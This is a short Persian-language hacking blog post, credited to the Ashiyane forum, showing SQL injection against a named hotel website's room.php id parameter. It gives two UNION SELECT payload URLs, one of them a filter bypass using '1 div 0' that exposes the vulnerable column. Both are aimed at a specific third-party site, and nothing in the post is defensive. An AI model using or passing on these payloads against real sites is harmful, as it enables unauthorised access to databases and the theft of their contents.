تارگتی که آماده کردم یه نکته ای داره و اون این که به هر چیزی که پشت عدد قرار بگیره گیر میدهیعنی صفحه به حالت سفید در میاد


http://cabochonhotel.com/room.php?id=.99+UNION(SELECT(version()),(2))

در چنین حالتی میشه به این روش عمل کرد و کلاً دور زد 


http://cabochonhotel.com/room.php?id=1 div 0+union+select+1,2
دیدین حالا شماره کالمن آسیب پذیر برای ما نشون داده شد
موفق و پیروز باشید
منبع : انجمن آشیانه

نوشته شده در تاریخ یکشنبه 2 اسفند 1394    | توسط: No Name    |    |
نظرات()